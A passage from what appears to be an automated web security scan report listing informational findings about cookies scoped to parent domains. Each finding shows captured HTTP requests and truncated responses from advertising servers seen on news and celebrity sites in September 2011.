Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

height=225
url=http://bostonherald.com/news/national/
sec=top
width=300
dpid=90017
sub=
wgt=1
sitesection=bostonherald_top

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr296109387_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:04:09 GMT; Path=/; HttpOnly
Set-Cookie: tr296109387_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:04:09 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:04:09 GMT
Server: lighttpd/1.4.18
Content-Length: 8834

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>296109387</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>

...[SNIP]...

11.26. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010627&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 128
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

sec=oth
url=http://bostonherald.com/entertainment/
dpid=90017
width=300
sub=
height=225
wgt=1
sitesection=bostonheraldentertain

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1605144227_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:44:31 GMT; Path=/; HttpOnly
Set-Cookie: tr1605144227_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:44:31 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:44:31 GMT
Server: lighttpd/1.4.18
Content-Length: 8889

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1605144227</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>
...[SNIP]...

11.27. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010414&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 201
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

sec=oth
width=300
dpid=90017
height=225
sub=
url=http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track
wgt=1
sitesection=bostonheraldentertain
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1906298967_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:23:08 GMT; Path=/; HttpOnly
Set-Cookie: tr1906298967_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:23:08 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:23:08 GMT
Server: lighttpd/1.4.18
Content-Length: 9591

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1906298967</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>
...[SNIP]...

11.28. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010847&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 114
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

sec=top
url=http://bostonherald.com/news/
dpid=90017
width=300
sub=
height=225
wgt=1
sitesection=bostonherald_top

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr1897101890_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:07:20 GMT; Path=/; HttpOnly
Set-Cookie: tr1897101890_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:07:20 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:07:20 GMT
Server: lighttpd/1.4.18
Content-Length: 8781

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>1897101890</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>
...[SNIP]...

11.29. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010156&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 130
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

height=225
url=http://bostonherald.com/news/regional/view.bg
sec=top
width=300
dpid=90017
sub=
wgt=1
sitesection=bostonherald_top

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr671918980_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:12:46 GMT; Path=/; HttpOnly
Set-Cookie: tr671918980_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:12:46 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:12:46 GMT
Server: lighttpd/1.4.18
Content-Length: 8897

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>671918980</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>

...[SNIP]...

11.30. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50832&l=20110917010822&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 161
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=k3eOxvzvTaul6aJcNabKkA

sec=oth
url=http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
dpid=90017
width=300
sub=
height=225
wgt=1
sitesection=bostonheraldentertain

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr430016412_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:06:56 GMT; Path=/; HttpOnly
Set-Cookie: tr430016412_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 02:06:56 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 01:06:56 GMT
Server: lighttpd/1.4.18
Content-Length: 9214

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>430016412</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50832</z>

...[SNIP]...

11.31. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5739.140101.AD.COM/B5822790.2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5739.140101.AD.COM/B5822790.2;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000804034/mnum=0001076846/cstr=48830520=_4e73ef55,7812332526,804034%5E1076846%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=48830520/optn=64?trg=;ord=7812332526? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6515
Set-Cookie: id=c55c63c3c0000db||t=1316220818|et=730|cs=002213fd48aa589fa00fdf2f13; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 00:53:38 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 00:53:38 GMT
Date: Sat, 17 Sep 2011 00:53:38 GMT
Expires: Sat, 17 Sep 2011 00:53:38 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 10:41:29 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

11.32. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5739.140101.AD.COM/B5822790.3

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5739.140101.AD.COM/B5822790.3;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000791296/mnum=0001076845/cstr=67593853=_4e73f069,2688307180,791296%5E1076845%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=67593853/optn=64?trg=;ord=2688307180? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6524
Set-Cookie: id=cf7ce3c3c0000a4||t=1316221290|et=730|cs=002213fd48760c6e5221f8bafc; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:01:30 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:01:30 GMT
Date: Sat, 17 Sep 2011 01:01:30 GMT
Expires: Sat, 17 Sep 2011 01:01:30 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 10:37:58 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...

11.33. http://ad.doubleclick.net/adj/q1.bosherald/be_news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/be_news;net=q1;u=,q1-30505236538_1316221208,,polit,;;cmw=owl;sz=300x250;net=q1;env=ifr;ord1=36513;contx=polit;dc=s;btg=;ord=2118037356?? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 267
Set-Cookie: id=c7adf3c3c0000b8||t=1316221822|et=730|cs=002213fd48b210656f748fd522; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:10:22 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:10:22 GMT
Date: Sat, 17 Sep 2011 01:10:22 GMT
Expires: Sat, 17 Sep 2011 01:10:22 GMT
Cache-Control: private

document.write('');

var pubId=27330;
var siteId=27331;
var kadId=23102;
var kadwidth=300;
var kadheight=250;
var kadtype=1;

document.write('\n<script type=\"text/javascript\" src=\"http://ads.pubmat
...[SNIP]...

11.34. http://ad.doubleclick.net/adj/q1.bosherald/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.bosherald/news

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/q1.bosherald/news;net=q1;u=,q1-30416237379_1316221208,,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464?? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5442
Set-Cookie: id=c7adf3c3c0000bb||t=1316221823|et=730|cs=002213fd48c58f2052188f45a2; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:10:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:10:23 GMT
Date: Sat, 17 Sep 2011 01:10:23 GMT
Expires: Sat, 17 Sep 2011 01:10:23 GMT
Cache-Control: private

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...

11.35. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_hookups

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/tmz.category.wb.dart/celebrity_hookups;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90,970x250,948x250,970x66;qcseg=D;ord=362463614437729.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 281
Set-Cookie: id=ca1cd3c3c0000a9||t=1316221132|et=730|cs=002213fd48eb3ee1c1d9cb15bb; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 00:58:52 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 00:58:52 GMT
Date: Sat, 17 Sep 2011 00:58:53 GMT
Expires: Sat, 17 Sep 2011 00:58:53 GMT
Cache-Control: private

document.write('');

admeld_publisher = 221;
admeld_site = 'tmz';
admeld_size = '728x90';
admeld_placement = 'ros';
admeld_no_iframe = true;

document.write('\n<script type=\"text/javas
...[SNIP]...

11.36. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/tmz.category.wb.dart/celebrity_justice

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/tmz.category.wb.dart/celebrity_justice;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90,970x250,948x250,970x66;qcseg=D;ord=6496930022258312 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7086
Set-Cookie: id=c16d03c3c0000e6||t=1316221226|et=730|cs=002213fd483f04ced38c13e383; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:00:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:00:26 GMT
Date: Sat, 17 Sep 2011 01:00:26 GMT
Expires: Sat, 17 Sep 2011 01:00:26 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Sep 16 20:01:17 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...

11.37. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=157&migSource=adsrv2&migTrackDataExt=1249573;69485624;245892120;43918246&migRandom=6620679&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://abc.go.com/shows/charlies-angels HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1249573/CA_300x600.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=157&migSource=adsrv2&migTrackDataExt=1249573;69485624;245892120;43918246&migRandom=6620679&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://abc.go.com/shows/charlies-angels
Set-Cookie: id=ccfcf3c3c000034|1249573/915341/15234|t=1316221297|et=730|cs=002213fd48a1a7cd298395cfac; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:01:37 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:01:37 GMT
Date: Sat, 17 Sep 2011 01:01:37 GMT
Server: GFE/2.0
Content-Type: text/html


11.38. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=113617&t=s HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:10:21 GMT
Expires: Sat, 17 Sep 2011 01:10:21 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh09/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Sun, 16-Sep-2012 01:10:21 GMT; Path=/
Content-Type: text/javascript
Content-Length: 297
Connection: close

document.write('<img height=\"1\" width=\"1\" style=\"border-style:none;\" alt=\"\" src=\"http://www.googleadservices.com/pagead/conversion/1045336492/?label=Zam9CPCCmAIQrKO68gM&amp;guid=ON&amp;script
...[SNIP]...

11.39. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316239631507&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D245022995%26epid%3D69978503%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5761718%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221519903_63671954_as3102_vew|374#1316221519820_135153353_as3104_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
